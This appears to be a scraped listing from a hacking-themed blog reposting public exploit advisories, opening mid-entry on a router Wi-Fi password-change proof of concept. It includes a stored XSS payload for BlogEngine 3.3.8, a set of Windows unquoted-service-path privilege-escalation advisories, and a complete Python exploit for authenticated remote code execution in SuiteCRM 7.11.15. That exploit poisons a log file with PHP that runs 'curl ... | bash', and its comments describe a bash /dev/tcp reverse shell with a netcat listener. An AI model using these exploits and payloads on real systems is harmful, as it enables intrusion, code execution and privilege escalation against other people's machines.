in to the Router admin panel (192.168.1.1). It can be seen that the WIFI connection is dropped. To reconnect, forget the WIFI connection on your laptop or phone and connect using the newly changed password: NEWPASSWORD 4. PoC Video: https://www.youtube.com/watch?v=nSu5ANDH2Rk&feature=emb_title 3. Timeline Vulnerability reported to the Genexis team – August 28, 2020 Team confirmed firmware release containing fix – September 14, 2020
  12. HireHackking

    BlogEngine 3.3.8 - 'Content' Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: BlogEngine 3.3.8 - 'Content' Stored XSS # Date: 11/2020 # Exploit Author: Andrey Stoykov # Vendor Homepage: https://blogengine.io/ # Software Link: https://github.com/BlogEngine/BlogEngine.NET/releases/download/v3.3.8.0/3380.zip # Version: 3.3.8 # Tested on: Windows Server 2016 # Exploit and Detailed Info: https://infosecresearchlab.blogspot.com/2020/11/blogengine-338-stored-xss.html Stored XSS Reproduction Steps: 1. Login http://IP/blogengine/admin/app/editor/editpost.cshtml 2. Add content and trap POST request into intercepting proxy 3. Add the XSS payload into the "Content" parameter value 4. Browse to the post to trigger the XSS payload Example HTTP POST Request: POST /blogengine/api/posts HTTP/1.1 Host: 192.168.56.6 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 [..] { "Id": "", "Title": "XSS Test", "Author": "Admin", "Content": "<img src=x onerror=alert(`XSS`)>", [..] } Example HTTP Response: HTTP/1.1 201 Created Cache-Control: no-cache [..] { "IsChecked": false, "Id": "357ae13d-f230-486a-b2aa-71d67a700083", "Title": "XSS Test", "Author": "Admin", "Description": "", "Content": "<img src=x onerror=alert(`XSS`)>", [..] }
  13. HireHackking

    HP Display Assistant x64 Edition 3.20 - 'DTSRVC' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: HP Display Assistant x64 Edition 3.20 - 'DTSRVC' Unquoted Service Path # Date: 2020-11-08 # Exploit Author: Julio Aviña # Vendor Homepage: https://www.portrait.com/ # Software Link: https://www.portrait.com/dtune/hwp/enu/ # Software Version: 3.20 # File Version: 1.0.0.1 # Tested on: Windows 10 Pro x64 es # Vulnerability Type: Unquoted Service Path # 1. To find the unquoted service path vulnerability C:\>wmic service where 'name like "%DTSRVC%"' get name, displayname, pathname, startmode, startname DisplayName Name PathName StartMode StartName Portrait Displays Display Tune Service DTSRVC C:\Program Files (x86)\Common Files\Portrait Displays\Shared\dtsrvc.exe Auto LocalSystem # 2. To check service info: C:\>sc qc "DTSRVC" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: DTSRVC TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Common Files\Portrait Displays\Shared\dtsrvc.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Portrait Displays Display Tune Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem # 3. Exploit: A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application. When restarting the service or the system, the inserted executable will run with elevated privileges.
  14. HireHackking

    SuiteCRM 7.11.15 - 'last_name' Remote Code Execution (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SuiteCRM 7.11.15 - 'last_name' Remote Code Execution (Authenticated) # Date: 08 NOV 2020 # Exploit Author: M. Cory Billington (@_th3y) # Vendor Homepage: https://suitecrm.com/ # Software Link: https://github.com/salesagility/SuiteCRM # Version: 7.11.15 and below # Tested on: Ubuntu 20.04 LTS # CVE: CVE-2020-28328 # Writeup: https://github.com/mcorybillington/SuiteCRM-RCE from requests import Session from random import choice from string import ascii_lowercase url = "http://127.0.0.1/" # URL to remote host web root post_url = "{url}index.php".format(url=url) user_name = "admin" # User must be an administrator password = "admin" prefix = 'shell-' file_name = '{prefix}{rand}.php'.format( prefix=prefix, rand=''.join(choice(ascii_lowercase) for _ in range(6)) ) # *Recommend K.I.S.S as some characters are escaped* # Example for reverse shell: # Put 'bash -c '(bash -i >& /dev/tcp/127.0.0.1/8080 0>&1)&' inside a file named shell.sh # Stand up a python web server `python -m http.server 80` hosting shell.sh # Set a nc listener to catch the shell 'nc -nlvp 8080' command = '<?php `curl -s http://127.0.0.1/shell.sh | bash`; ?>'.format(fname=file_name) # Admin login payload login_data = { "module": "Users", "action": "Authenticate", "return_module": "Users", "return_action": "Login", "user_name": user_name, "username_password": password, "Login": "Log+In" } # Payload to set logging to 'info' and create a log file in php format. modify_system_settings_data = { "action": (None, "SaveConfig"), "module": (None, "Configurator"), "logger_file_name": (None, file_name), # Set file extension in the file name as it isn't checked here "logger_file_ext": (None, ''), # Bypasses file extension check by just not setting one. "logger_level": (None, "info"), # This is important for your php code to make it into the logs "save": (None, "Save") } # Payload to put php code into the malicious log file poison_log = { "module": (None, "Users"), "record": (None, "1"), "action": (None, "Save"), "page": (None, "EditView"), "return_action": (None, "DetailView"), "user_name": (None, user_name), "last_name": (None, command), } # Payload to restore the log file settings to default after the exploit runs restore_log = { "action": (None, "SaveConfig"), "module": (None, "Configurator"), "logger_file_name": (None, "suitecrm"), # Default log file name "logger_file_ext": (None, ".log"), # Default log file extension "logger_level": (None, "fatal"), # Default log file setting "save": (None, "Save") } # Start of exploit with Session() as s: # Authenticating as the administrator s.get(post_url, params={'module': 'Users', 'action': 'Login'}) print('[+] Got initial PHPSESSID:', s.cookies.get_dict()['PHPSESSID']) s.post(post_url, data=login_data) if 'ck_login_id_20' not in s.cookies.get_dict().keys(): print('[-] Invalid password for: {user}'.format(user=user_name)) exit(1) print('[+] Authenticated as: {user}. PHPSESSID: {cookie}'.format( user=user_name, cookie=s.cookies.get_dict()['PHPSESSID']) ) # Modify the system settings to set logging to 'info' and create a log file in php format print('[+] Modifying log level and log file name.') print('[+] File name will be: {fname}'.format(fname=file_name)) settings_header = {'Referer': '{url}?module=Configurator&action=EditView'.format(url=url)} s.post(post_url, headers=settings_header, files=modify_system_settings_data) # Post to update the administrator's last name with php code that will poison the log file print('[+] Poisoning log file with php code: {cmd}'.format(cmd=command)) command_header = {'Referer': '{url}?module=Configurator&action=EditView'.format(url=url)} s.post(url, headers=command_header, files=poison_log) # May be a good idea to put a short delay in here to allow your code to make it into the logfile. # Up to you though... # Do a get request to trigger php code execution. print('[+] Executing code. Sending GET request to: {url}{fname}'.format(url=url, fname=file_name)) execute_command = s.get('{url}/{fname}'.format(url=url, fname=file_name), timeout=1) if not execute_command.ok: print('[-] Exploit failed, sorry... Might have to do some modifications.') # Restoring log file to default print('[+] Setting log back to defaults') s.post(post_url, headers=settings_header, files=restore_log) print('[+] Done. Clean up {fname} if you care...'.format(fname=file_name))
  15. HireHackking

    Winstep 18.06.0096 - 'Xtreme Service' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: Winstep 18.06.0096 - 'Xtreme Service' Unquoted Service Path #Exploit Author : SamAlucard #Exploit Date: 2020-11-08 #Vendor : Winstep #Version : WsxService 18.06.0096 #Vendor Homepage : https://www.winstep.net/xtreme.asp #Tested on OS: Windows 7 Pro #Analyze PoC : ============== C:\>sc qc "Winstep Xtreme Service" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Winstep Xtreme Service TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\Winstep\WsxService GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Winstep Xtreme Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
  16. HireHackking

    KMSpico 17.1.0.0 - 'Service KMSELDI' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: KMSpico 17.1.0.0 - 'Service KMSELDI' Unquoted Service Path #Exploit Author : SamAlucard #Exploit Date: 2020-11-08 #Vendor : KMSpico #Version : Service_KMS 17.1.0.0 #Vendor Homepage : https://official-kmspico.com/ #Tested on OS: Windows 7 Pro #Analyze PoC : ============== C:\>sc qc "Service KMSELDI" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Service KMSELDI TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\KMSpico\Service_KMS.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Service KMSELDI DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
  17. HireHackking

    OKI sPSV Port Manager 1.0.41 - 'sPSVOpLclSrv' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: OKI sPSV Port Manager 1.0.41 - 'sPSVOpLclSrv' Unquoted Service Path # Date: 2020-11-08 # Exploit Author: Julio Aviña # Vendor Homepage: https://www.oki.com/ # Software Link: https://www.oki.com/mx/printing/download/sPSV_010041_2_270910.exe # Software Version: 1.0.41 # File Version: 1.4.2.0 # Tested on: Windows 10 Pro x64 es # Vulnerability Type: Unquoted Service Path # 1. To find the unquoted service path vulnerability C:\>wmic service where 'name like "%sPSVOpLclSrv%"' get displayname, pathname, startmode, startname DisplayName PathName StartMode StartName OKI sPSV Port Manager C:\Program Files\Okidata\smart PrintSuperVision\xml\ComApi\extend3\portmgrsrv.exe Auto LocalSystem # 2. To check service info: C:\>sc qc "sPSVOpLclSrv" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: sPSVOpLclSrv TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\Okidata\smart PrintSuperVision\xml\ComApi\extend3\portmgrsrv.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : OKI sPSV Port Manager DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem # 3. Exploit: A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application. When restarting the service or the system, the inserted executable will run with elevated privileges.
  18. HireHackking

    IPTInstaller 4.0.9 - 'PassThru Service' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: IPTInstaller 4.0.9 - 'PassThru Service' Unquoted Service Path #Exploit Author : SamAlucard #Exploit Date: 2020-11-08 #Vendor : HTC #Version : IPTInstaller 4.0.9 #Vendor Homepage : https://www.htc.com/latam/ #Tested on OS: Windows 7 Pro #Analyze PoC : ============== C:\Users\DSAZ230>sc qc "PassThru Service" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: PassThru Service TIPO : 10 [image: PassThruserv.jpg] WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Internet Pass-Through Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
  19. HireHackking

    DigitalPersona 4.5.0.2213 - 'DpHostW' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: DigitalPersona 4.5.0.2213 - 'DpHostW' Unquoted Service Path #Exploit Author : SamAlucard #Exploit Date: 2020-11-08 #Vendor : DigitalPersona U. are U. One Touch #Version : DigitalPersona Pro 4.5.0.2213 #Vendor Homepage : https://www.hidglobal.com/crossmatch #Tested on OS: Windows 10 Home #Analyze PoC : ============== C:\>sc qc DpHost [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: DpHost TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\DigitalPersona\Bin\DpHostW.exe GRUPO_ORDEN_CARGA : BiometricGroup ETIQUETA : 0 NOMBRE_MOSTRAR : Servicio de autenticación biométrica DEPENDENCIAS : RPCSS NOMBRE_INICIO_SERVICIO: LocalSystem
  20. HireHackking

    Genexus Protection Server 9.6.4.2 - 'protsrvservice' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: Genexus Protection Server 9.6.4.2 - 'protsrvservice' Unquoted Service Path Service Path #Exploit Author : SamAlucard #Exploit Date: 2020-11-08 #Vendor : Genexus #Version : Genexus Protection Server 9.6.4.2 #Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;; #Vendor Homepage : https://www.genexus.com/es/ #Tested on OS: Windows 10 Pro #Analyze PoC : ============== C:\>sc qc protsrvservice [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: protsrvservice TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Common Files\Artech\GXProt1\ProtSrv.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : ProtSrvService DEPENDENCIAS : RPCSS NOMBRE_INICIO_SERVICIO: LocalSystem
  21. HireHackking

    HP WMI Service 1.4.8.0 - 'HPWMISVC.exe' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: HP WMI Service 1.4.8.0 - 'HPWMISVC.exe' Unquoted Service Path #Discovery by: Jocelyn Arenas #Discovery Date: 2020-11-07 #Vendor Homepage: https://www8.hp.com/mx/es/home.html #Tested Version: 1.4.8.0 #Vulnerability Type: Unquoted Service Path #Tested on OS: Windows 10 Home x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\windows\\" | findstr /i /v """ HPWMISVC HPWMISVC c:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe Auto #Service info: C:\>sc qc HPWMISVC [SC] QueryServiceConfig SUCCESS SERVICE_NAME : HPWMISVC TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : c:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : HPWMISVC DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  22. HireHackking

    Syncplify.me Server! 5.0.37 - 'SMWebRestServicev5' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Syncplify.me Server! 5.0.37 - 'SMWebRestServicev5' Unquoted Service Path # Date: 2020-11-08 # Exploit Author: Julio Aviña # Vendor Homepage: https://www.syncplify.me/ # Software Link: https://download.syncplify.me/SMServer_Setup.exe # Version: 5.0.37 # Tested on: Windows 10 Pro x64 es # Vulnerability Type: Unquoted Service Path # 1. To find the unquoted service path vulnerability C:\>wmic service where 'name like "%SMWebRestServicev5%"' get displayname, pathname, startmode, startname DisplayName PathName StartMode StartName Syncplify.me Web/REST Server! v5 C:\Program Files\Syncplify\Syncplify.me Server!\SMWebRestSvc.exe Auto LocalSystem # 2. To check service info: C:\>sc qc "SMWebRestServicev5" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: SMWebRestServicev5 TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\Syncplify\Syncplify.me Server!\SMWebRestSvc.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Syncplify.me Web/REST Server! v5 DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem # 3. Exploit: A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application. When restarting the service or the system, the inserted executable will run with elevated privileges.
  23. HireHackking

    Motorola Device Manager 2.4.5 - 'ForwardDaemon.exe ' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Motorola Device Manager 2.4.5 - 'ForwardDaemon.exe ' Unquoted Service Path # Discovery by: Angel Canseco # Discovery Date: 2020-11-08 # Vendor Homepage: https://www.filehorse.com/es/descargar-motorola-device-manager/ # Tested Version: 2.4.5 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "PST Service " | findstr /i /v """ Motorola Device Manager C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe Auto # Service info: PST Service C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe Auto C:\>sc qc "PST Service" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: PST Service TIPO : 110 WIN32_OWN_PROCESS (interactive) TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : PST Service DEPENDENCIAS : lanmanworkstation NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: A successful attempt would cause the local user to be able to insert their code in the system root path undetected by the OS or other security applications and elevate his privileges after reboot.
  24. HireHackking

    Realtek Andrea RT Filters 1.0.64.10 - 'AERTSr64.EXE' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Realtek Andrea RT Filters 1.0.64.10 - 'AERTSr64.EXE' Unquoted Service Path # Discovery by: Erika Figueroa # Discovery Date: 2020-11-07 # Vendor Homepage: https://www.realtek.com/en/ # Tested Version: 1.0.64.10 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 8.1 x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i /v """ Andrea RT Filters Service AERTFilters C:\Program Files\Realtek\Audio\HDA\AERTSr64.EXE Auto # Service info: C:\>sc qc "AERTFilters" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: AERTFilters TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\Realtek\Audio\HDA\AERTSr64.EXE GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Andrea RT Filters Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  25. HireHackking

    Motorola Device Manager 2.5.4 - 'ForwardDaemon.exe ' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Motorola Device Manager 2.5.4 - 'ForwardDaemon.exe 'Unquoted Service Path # Discovery by: Angel Canseco # Discovery Date: 2020-11-07 # Vendor Homepage: https://motorola-device-manager.programas-gratis.net/gracias # Tested Version: 2.5.4 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ForwardDaemon" | findstr /i /v """ PST Service C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe Auto C:\Users\MISTI>sc qc "PST Service" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: PST Service TIPO : 110 WIN32_OWN_PROCESS (interactive) TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : PST Service DEPENDENCIAS : lanmanworkstation NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: A successful attempt would cause the local user to be able to insert their code in the system root path undetected by the OS or other security applications and elevate his privileges after reboot.